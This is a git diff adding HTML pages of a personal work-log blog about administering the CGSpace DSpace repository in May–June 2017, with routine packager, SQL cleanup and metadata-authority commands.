+<li>Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request</li>
+</ul>
+<h2 id="2017-05-04">2017-05-04</h2>
+<ul>
+<li>Sync DSpace Test with database and assetstore from CGSpace</li>
+<li>Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server</li>
+<li>Now I can see the workflow statistics and am able to select users, but everything returns 0 items</li>
+<li>Megan says there are still some mapped items are not appearing since last week, so I forced a full <code>index-discovery -b</code></li>
+<li>Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: <a href="https://cgspace.cgiar.org/handle/10568/80731">https://cgspace.cgiar.org/handle/10568/80731</a></li>
+</ul>
+<h2 id="2017-05-05">2017-05-05</h2>
+<ul>
+<li>Discovered that CGSpace has ~700 items that are missing the <code>cg.identifier.status</code> field</li>
+<li>Need to perhaps try using the &ldquo;required metadata&rdquo; curation task to find fields missing these items:</li>
+</ul>
+<pre tabindex="0"><code>$ [dspace]/bin/dspace curate -t requiredmetadata -i 10568/1 -r - &gt; /tmp/curation.out
+</code></pre><ul>
+<li>It seems the curation task dies when it finds an item which has missing metadata</li>
+</ul>
+<h2 id="2017-05-06">2017-05-06</h2>
+<ul>
+<li>Add &ldquo;Blog Post&rdquo; to <code>dc.type</code></li>
+<li>Create ticket on Atmire tracker to ask about commissioning them to develop the feature to expose ORCID via REST/OAI: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=510">https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=510</a></li>
+<li>According to the <a href="https://wiki.lyrasis.org/display/DSDOC5x/Curation+System">DSpace curation docs</a> the fact that the <code>requiredmetadata</code> curation task stops when it finds a missing metadata field is by design</li>
+</ul>
+<h2 id="2017-05-07">2017-05-07</h2>
+<ul>
+<li>Testing one replacement for CCAFS Flagships (<code>cg.subject.ccafs</code>), first changed in the submission forms, and then in the database:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p fuuu
+</code></pre><ul>
+<li>Also, CCAFS wants to re-order their flagships to prioritize the Phase II ones</li>
+<li>Waiting for feedback from CCAFS, then I can merge <a href="https://github.com/ilri/DSpace/pull/320">#320</a></li>
+</ul>
+<h2 id="2017-05-08">2017-05-08</h2>
+<ul>
+<li>Start working on CGIAR Library migration</li>
+<li>We decided to use AIP export to preserve the hierarchies and handles of communities and collections</li>
+<li>When ingesting some collections I was getting <code>java.lang.OutOfMemoryError: GC overhead limit exceeded</code>, which can be solved by disabling the GC timeout with <code>-XX:-UseGCOverheadLimit</code></li>
+<li>Other times I was getting an error about heap space, so I kept bumping the RAM allocation by 512MB each time (up to 4096m!) it crashed</li>
+<li>This leads to tens of thousands of abandoned files in the assetstore, which need to be cleaned up using <code>dspace cleanup -v</code>, or else you&rsquo;ll run out of disk space</li>
+<li>In the end I realized it&rsquo;s better to use submission mode (<code>-s</code>) to ingest the community object as a single AIP without its children, followed by each of the collections:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx2048m -XX:-UseGCOverheadLimit&#34;
+$ [dspace]/bin/dspace packager -s -o ignoreHandle=false -t AIP -e some@user.com -p 10568/87775 /home/aorth/10947-1/10947-1.zip
+$ for collection in /home/aorth/10947-1/COLLECTION@10947-*; do [dspace]/bin/dspace packager -s -o ignoreHandle=false -t AIP -e some@user.com -p 10947/1 $collection; done
+$ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager -r -f -u -t AIP -e some@user.com $item; done
+</code></pre><ul>
+<li>Note that in submission mode DSpace ignores the handle specified in <code>mets.xml</code> in the zip file, so you need to turn that off with <code>-o ignoreHandle=false</code></li>
+<li>The <code>-u</code> option supresses prompts, to allow the process to run without user input</li>
+<li>Give feedback to CIFOR about their data quality:
+<ul>
+<li>Suggestion: uppercase dc.subject, cg.coverage.region, and cg.coverage.subregion in your crosswalk so they match CGSpace and therefore can be faceted / reported on easier</li>
+<li>Suggestion: use CGSpace&rsquo;s CRP names (cg.contributor.crp), see: dspace/config/input-forms.xml</li>
+<li>Suggestion: clean up duplicates and errors in funders, perhaps use a controlled vocabulary like ours, see: dspace/config/controlled-vocabularies/dc-description-sponsorship.xml</li>
+<li>Suggestion: use dc.type &ldquo;Blog Post&rdquo; instead of &ldquo;Blog&rdquo; for your blog post items (we are also adding a &ldquo;Blog Post&rdquo; type to CGSpace soon)</li>
+<li>Question: many of your items use dc.document.uri AND cg.identifier.url with the same text value?</li>
+</ul>
+</li>
+<li>Help Marianne from WLE with an Open Search query to show the latest WLE CRP outputs: <a href="https://cgspace.cgiar.org/open-search/discover?query=crpsubject:WATER%2C+LAND+AND+ECOSYSTEMS&amp;sort_by=2&amp;order=DESC">https://cgspace.cgiar.org/open-search/discover?query=crpsubject:WATER%2C+LAND+AND+ECOSYSTEMS&amp;sort_by=2&amp;order=DESC</a></li>
+<li>This uses the webui&rsquo;s item list sort options, see <code>webui.itemlist.sort-option</code> in <code>dspace.cfg</code></li>
+<li>The equivalent Discovery search would be: <a href="https://cgspace.cgiar.org/discover?filtertype_1=crpsubject&amp;filter_relational_operator_1=equals&amp;filter_1=WATER%2C+LAND+AND+ECOSYSTEMS&amp;submit_apply_filter=&amp;query=&amp;rpp=10&amp;sort_by=dc.date.issued_dt&amp;order=desc">https://cgspace.cgiar.org/discover?filtertype_1=crpsubject&amp;filter_relational_operator_1=equals&amp;filter_1=WATER%2C+LAND+AND+ECOSYSTEMS&amp;submit_apply_filter=&amp;query=&amp;rpp=10&amp;sort_by=dc.date.issued_dt&amp;order=desc</a></li>
+</ul>
+<h2 id="2017-05-09">2017-05-09</h2>
+<ul>
+<li>The CGIAR Library metadata has some blank metadata values, which leads to <code>|||</code> in the Discovery facets</li>
+<li>Clean these up in the database using:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
+</code></pre><ul>
+<li>I ended up running into issues during data cleaning and decided to wipe out the entire community and re-sync DSpace Test assetstore and database from CGSpace rather than waiting for the cleanup task to clean up</li>
+<li>Hours into the re-ingestion I ran into more errors, and had to erase everything and start over <em>again</em>!</li>
+<li>Now, no matter what I do I keep getting foreign key errors&hellip;</li>
+</ul>
+<pre tabindex="0"><code>Caused by: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint &#34;handle_pkey&#34;
+  Detail: Key (handle_id)=(80928) already exists.
+</code></pre><ul>
+<li>I think those errors actually come from me running the <code>update-sequences.sql</code> script while Tomcat/DSpace are running</li>
+<li>Apparently you need to stop Tomcat!</li>
+</ul>
+<h2 id="2017-05-10">2017-05-10</h2>
+<ul>
+<li>Atmire says they are willing to extend the ORCID implementation, and I&rsquo;ve asked them to provide a quote</li>
+<li>I clarified that the scope of the implementation should be that ORCIDs are stored in the database and exposed via REST / API like other fields</li>
+<li>Finally finished importing all the CGIAR Library content, final method was:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit&#34;
+$ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2517/10947-2517.zip
+$ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2515/10947-2515.zip
+$ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2516/10947-2516.zip
+$ [dspace]/bin/dspace packager -s -t AIP -o ignoreHandle=false -e some@user.com -p 10568/80923 /home/aorth/10947-1/10947-1.zip
+$ for collection in /home/aorth/10947-1/COLLECTION@10947-*; do [dspace]/bin/dspace packager -s -o ignoreHandle=false -t AIP -e some@user.com -p 10947/1 $collection; done
+$ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager -r -f -u -t AIP -e some@user.com $item; done
+</code></pre><ul>
+<li>Basically, import the smaller communities using recursive AIP import (with <code>skipIfParentMissing</code>)</li>
+<li>Then, for the larger collection, create the community, collections, and items separately, ingesting the items one by one</li>
+<li>The <code>-XX:-UseGCOverheadLimit</code> JVM option helps with some issues in large imports</li>
+<li>After this I ran the <code>update-sequences.sql</code> script (with Tomcat shut down), and cleaned up the 200+ blank metadata records:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
+</code></pre><h2 id="2017-05-13">2017-05-13</h2>
+<ul>
+<li>After quite a bit of troubleshooting with importing cleaned up data as CSV, it seems that there are actually <a href="https://en.wikipedia.org/wiki/Null_character">NUL</a> characters in the <code>dc.description.abstract</code> field (at least) on the lines where CSV importing was failing</li>
+<li>I tried to find a way to remove the characters in vim or Open Refine, but decided it was quicker to just remove the column temporarily and import it</li>
+<li>The import was successful and detected 2022 changes, which should likely be the rest that were failing to import before</li>
+</ul>
+<h2 id="2017-05-15">2017-05-15</h2>
+<ul>
+<li>To delete the blank lines that cause isses during import we need to use a regex in vim <code>g/^$/d</code></li>
+<li>After that I started looking in the <code>dc.subject</code> field to try to pull countries and regions out, but there are too many values in there</li>
+<li>Bump the Academicons dependency of the Mirage 2 themes from 1.6.0 to 1.8.0 because the upstream deleted the old tag and now the build is failing: <a href="https://github.com/ilri/DSpace/pull/321">#321</a></li>
+<li>Merge changes to CCAFS project identifiers and flagships: <a href="https://github.com/ilri/DSpace/pull/320">#320</a></li>
+<li>Run updates for CCAFS flagships on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>
+<p>These include:</p>
+<ul>
+<li>GENDER AND SOCIAL DIFFERENTIATION→GENDER AND SOCIAL INCLUSION</li>
+<li>MANAGING CLIMATE RISK→CLIMATE SERVICES AND SAFETY NETS</li>
+</ul>
+</li>
+<li>
+<p>Re-deploy CGSpace and DSpace Test and run system updates</p>
+</li>
+<li>
+<p>Reboot DSpace Test</p>
+</li>
+<li>
+<p>Fix cron jobs for log management on DSpace Test, as they weren&rsquo;t catching <code>dspace.log.*</code> files correctly and we had over six months of them and they were taking up many gigs of disk space</p>
+</li>
+</ul>
+<h2 id="2017-05-16">2017-05-16</h2>
+<ul>
+<li>Discuss updates to WLE themes for their Phase II</li>
+<li>Make an issue to track the changes to <code>cg.subject.wle</code>: <a href="https://github.com/ilri/DSpace/issues/322">#322</a></li>
+</ul>
+<h2 id="2017-05-17">2017-05-17</h2>
+<ul>
+<li>Looking into the error I get when trying to create a new collection on DSpace Test:</li>
+</ul>
+<pre tabindex="0"><code>ERROR: duplicate key value violates unique constraint &#34;handle_pkey&#34; Detail: Key (handle_id)=(84834) already exists.
+</code></pre><ul>
+<li>I tried updating the sequences a few times, with Tomcat running and stopped, but it hasn&rsquo;t helped</li>
+<li>It appears item with <code>handle_id</code> 84834 is one of the imported CGIAR Library items:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select * from handle where handle_id=84834;
+ handle_id |   handle   | resource_type_id | resource_id
+-----------+------------+------------------+-------------
+     84834 | 10947/1332 |                2 |       87113
+</code></pre><ul>
+<li>Looks like the max <code>handle_id</code> is actually much higher:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select * from handle where handle_id=(select max(handle_id) from handle);
+ handle_id |  handle  | resource_type_id | resource_id
+-----------+----------+------------------+-------------
+     86873 | 10947/99 |                2 |       89153
+(1 row)
+</code></pre><ul>
+<li>I&rsquo;ve posted on the dspace-test mailing list to see if I can just manually set the <code>handle_seq</code> to that value</li>
+<li>Actually, it seems I can manually set the handle sequence using:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select setval(&#39;handle_seq&#39;,86873);
+</code></pre><ul>
+<li>After that I can create collections just fine, though I&rsquo;m not sure if it has other side effects</li>
+</ul>
+<h2 id="2017-05-21">2017-05-21</h2>
+<ul>
+<li>Start creating a basic theme for the CGIAR System Organization&rsquo;s community on CGSpace</li>
+<li>Using colors from the <a href="http://library.cgiar.org/handle/10947/2699">CGIAR Branding guidelines (2014)</a></li>
+<li>Make a GitHub issue to track this work: <a href="https://github.com/ilri/DSpace/issues/324">#324</a></li>
+</ul>
+<h2 id="2017-05-22">2017-05-22</h2>
+<ul>
+<li>Do some cleanups of community and collection names in CGIAR System Management Office community on DSpace Test, as well as move some items as Peter requested</li>
+<li>Peter wanted a list of authors in here, so I generated a list of collections using the &ldquo;View Source&rdquo; on each community and this hacky awk:</li>
+</ul>
+<pre tabindex="0"><code>$ grep 10947/ /tmp/collections | grep -v cocoon | awk -F/ &#39;{print $3&#34;/&#34;$4}&#39; | awk -F\&#34; &#39;{print $1}&#39; | vim -
+</code></pre><ul>
+<li>Then I joined them together and ran this old SQL query from the dspace-tech mailing list which gives you authors for items in those collections:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select distinct text_value
+from metadatavalue
+where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;)
+AND resource_type_id = 2
+AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10947/2&#39;, &#39;10947/3&#39;, &#39;10947/1
+0&#39;, &#39;10947/4&#39;, &#39;10947/5&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;, &#39;10947/11&#39;, &#39;10947/25&#39;, &#39;10947/12&#39;, &#39;10947/26&#39;, &#39;10947/27&#39;, &#39;10947/28&#39;, &#39;10947/29&#39;, &#39;109
+47/30&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/17&#39;, &#39;10947
+/18&#39;, &#39;10947/38&#39;, &#39;10947/19&#39;, &#39;10947/39&#39;, &#39;10947/40&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/2512&#39;, &#39;10947/44&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/45&#39;, &#39;10947
+/46&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/2518&#39;, &#39;10947/2776&#39;, &#39;10947/2790&#39;, &#39;10947/2521&#39;,
+&#39;10947/2522&#39;, &#39;10947/2782&#39;, &#39;10947/2525&#39;, &#39;10947/2836&#39;, &#39;10947/2524&#39;, &#39;10947/2878&#39;, &#39;10947/2520&#39;, &#39;10947/2523&#39;, &#39;10947/2786&#39;, &#39;10947/2631&#39;, &#39;10947/2589&#39;, &#39;109
+47/2519&#39;, &#39;10947/2708&#39;, &#39;10947/2526&#39;, &#39;10947/2871&#39;, &#39;10947/2527&#39;, &#39;10947/4467&#39;, &#39;10947/3457&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2533&#39;, &#39;10947/2530&#39;, &#39;10947/2
+531&#39;, &#39;10947/2532&#39;, &#39;10947/2538&#39;, &#39;10947/2534&#39;, &#39;10947/2540&#39;, &#39;10947/2900&#39;, &#39;10947/2539&#39;, &#39;10947/2784&#39;, &#39;10947/2536&#39;, &#39;10947/2805&#39;, &#39;10947/2541&#39;, &#39;10947/2535&#39;
+, &#39;10947/2537&#39;, &#39;10568/93761&#39;)));
+</code></pre><ul>
+<li>To get a CSV (with counts) from that:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*)
+from metadatavalue
+where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;)
+AND resource_type_id = 2
+AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10947/2&#39;, &#39;10947/3&#39;, &#39;10947/10&#39;, &#39;10947/4&#39;, &#39;10947/5&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;, &#39;10947/11&#39;, &#39;10947/25&#39;, &#39;10947/12&#39;, &#39;10947/26&#39;, &#39;10947/27&#39;, &#39;10947/28&#39;, &#39;10947/29&#39;, &#39;10947/30&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/38&#39;, &#39;10947/19&#39;, &#39;10947/39&#39;, &#39;10947/40&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/2512&#39;, &#39;10947/44&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/45&#39;, &#39;10947/46&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/2518&#39;, &#39;10947/2776&#39;, &#39;10947/2790&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2782&#39;, &#39;10947/2525&#39;, &#39;10947/2836&#39;, &#39;10947/2524&#39;, &#39;10947/2878&#39;, &#39;10947/2520&#39;, &#39;10947/2523&#39;, &#39;10947/2786&#39;, &#39;10947/2631&#39;, &#39;10947/2589&#39;, &#39;10947/2519&#39;, &#39;10947/2708&#39;, &#39;10947/2526&#39;, &#39;10947/2871&#39;, &#39;10947/2527&#39;, &#39;10947/4467&#39;, &#39;10947/3457&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2533&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2538&#39;, &#39;10947/2534&#39;, &#39;10947/2540&#39;, &#39;10947/2900&#39;, &#39;10947/2539&#39;, &#39;10947/2784&#39;, &#39;10947/2536&#39;, &#39;10947/2805&#39;, &#39;10947/2541&#39;, &#39;10947/2535&#39;, &#39;10947/2537&#39;, &#39;10568/93761&#39;))) group by text_value order by count desc) to /tmp/cgiar-librar-authors.csv with csv;
+</code></pre><h2 id="2017-05-23">2017-05-23</h2>
+<ul>
+<li>Add Affiliation to filters on Listing and Reports module (<a href="https://github.com/ilri/DSpace/pull/325">#325</a>)</li>
+<li>Start looking at WLE&rsquo;s Phase II metadata updates but it seems they are not tagging their items properly, as their website importer infers which theme to use based on the name of the CGSpace collection!</li>
+<li>For now I&rsquo;ve suggested that they just change the collection names and that we fix their metadata manually afterwards</li>
+<li>Also, they have a lot of messed up values in their <code>cg.subject.wle</code> field so I will clean up some of those first:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id=119) to /tmp/wle.csv with csv;
+COPY 111
+</code></pre><ul>
+<li>Respond to Atmire message about ORCIDs, saying that right now we&rsquo;d prefer to just have them available via REST API like any other metadata field, and that I&rsquo;m available for a Skype</li>
+</ul>
+<h2 id="2017-05-26">2017-05-26</h2>
+<ul>
+<li>Increase max file size in nginx so that CIP can upload some larger PDFs</li>
+<li>Agree to talk with Atmire after the June DSpace developers meeting where they will be discussing exposing ORCIDs via REST/OAI</li>
+</ul>
+<h2 id="2017-05-28">2017-05-28</h2>
+<ul>
+<li>File an issue on GitHub to explore/track migration to proper country/region codes (ISO 2/3 and UN M.49): <a href="https://github.com/ilri/DSpace/issues/326">#326</a></li>
+<li>Ask Peter how the Landportal.info people should acknowledge us as the source of data on their website</li>
+<li>Communicate with MARLO people about progress on exposing ORCIDs via the REST API, as it is set to be discussed in the <a href="https://wiki.lyrasis.org/display/cmtygp/DCAT+Meeting+June+2017">June, 2017 DCAT meeting</a></li>
+<li>Find all of Amos Omore&rsquo;s author name variations so I can link them to his authority entry that has an ORCID:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like &#39;Omore, A%&#39;;
+</code></pre><ul>
+<li>Set the authority for all variations to one containing an ORCID:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;4428ee88-90ef-4107-b837-3c0ec988520b&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Omore, A%&#39;;
+UPDATE 187
+</code></pre><ul>
+<li>Next I need to do Edgar Twine:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like &#39;Twine, E%&#39;;
+</code></pre><ul>
+<li>But it doesn&rsquo;t look like any of his existing entries are linked to an authority which has an ORCID, so I edited the metadata via &ldquo;Edit this Item&rdquo; and looked up his ORCID and linked it there</li>
+<li>Now I should be able to set his name variations to the new authority:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;f70d0a01-d562-45b8-bca3-9cf7f249bc8b&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Twine, E%&#39;;
+</code></pre><ul>
+<li>Run the corrections on CGSpace and then update discovery / authority</li>
+<li>I notice that there are a handful of <code>java.lang.OutOfMemoryError: Java heap space</code> errors in the Catalina logs on CGSpace, I should go look into that&hellip;</li>
+</ul>
+<h2 id="2017-05-29">2017-05-29</h2>
+<ul>
+<li>Discuss WLE themes and subjects with Mia and Macaroni Bros</li>
+<li>We decided we need to create metadata fields for Phase I and II themes</li>
+<li>I&rsquo;ve updated the existing GitHub issue for Phase II (<a href="https://github.com/ilri/DSpace/issues/322">#322</a>) and created a new one to track the changes for Phase I themes (<a href="https://github.com/ilri/DSpace/issues/327">#327</a>)</li>
+<li>After Macaroni Bros update the WLE website importer we will rename the WLE collections to reflect Phase II</li>
+<li>Also, we need to have Mia and Udana look through the existing metadata in <code>cg.subject.wle</code> as it is quite a mess</li>
+</ul>
+
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2017-06/index.html b/docs/2017-06/index.html
new file mode 100644
index 000000000..7083f8cab
--- /dev/null
+++ b/docs/2017-06/index.html
@@ -0,0 +1,324 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="June, 2017" />
+<meta property="og:description" content="2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg." />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-06/" />
+<meta property="article:published_time" content="2017-06-01T10:14:52+03:00" />
+<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="June, 2017"/>
+<meta name="twitter:description" content="2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "June, 2017",
+  "url": "https://alanorth.github.io/cgspace-notes/2017-06/",
+  "wordCount": "1261",
+  "datePublished": "2017-06-01T10:14:52+03:00",
+  "dateModified": "2020-04-13T15:30:24+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2017-06/">
+
+    <title>June, 2017 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-06/">June, 2017</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2017-06-01T10:14:52+03:00">Thu Jun 01, 2017</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-06-01">2017-06-01</h2>
+<ul>
+<li>After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes</li>
+<li>The <code>cg.identifier.wletheme</code> field will be used for both Phase I and Phase II Research Themes</li>
+<li>Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there</li>
+<li>The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo;</li>
+<li>Tagged all items in the current Phase I collections with their appropriate themes</li>
+<li>Create pull request to add Phase II research themes to the submission form: <a href="https://github.com/ilri/DSpace/pull/328">#328</a></li>
+<li>Add <code>cg.subject.system</code> to CGSpace metadata registry, for subject from the upcoming CGIAR Library migration</li>
+</ul>
+<h2 id="2017-06-04">2017-06-04</h2>
+<ul>
+<li>After adding <code>cg.identifier.wletheme</code> to 1106 WLE items I can see the field on XMLUI but not in REST!</li>
+<li>Strangely it happens on DSpace Test AND on CGSpace!</li>
+<li>I tried to re-index Discovery but it didn&rsquo;t fix it</li>
+<li>Run all system updates on DSpace Test and reboot the server</li>
+<li>After rebooting the server (and therefore restarting Tomcat) the new metadata field is available</li>
+<li>I&rsquo;ve sent a message to the dspace-tech mailing list to ask if this is a bug and whether I should file a Jira ticket</li>
+</ul>
+<h2 id="2016-06-05">2016-06-05</h2>
+<ul>
+<li>Rename WLE&rsquo;s &ldquo;Research Themes&rdquo; sub-community to &ldquo;WLE Phase I Research Themes&rdquo; on DSpace Test so Macaroni Bros can continue their testing</li>
+<li>Macaroni Bros tested it and said it&rsquo;s fine, so I renamed it on CGSpace as well</li>
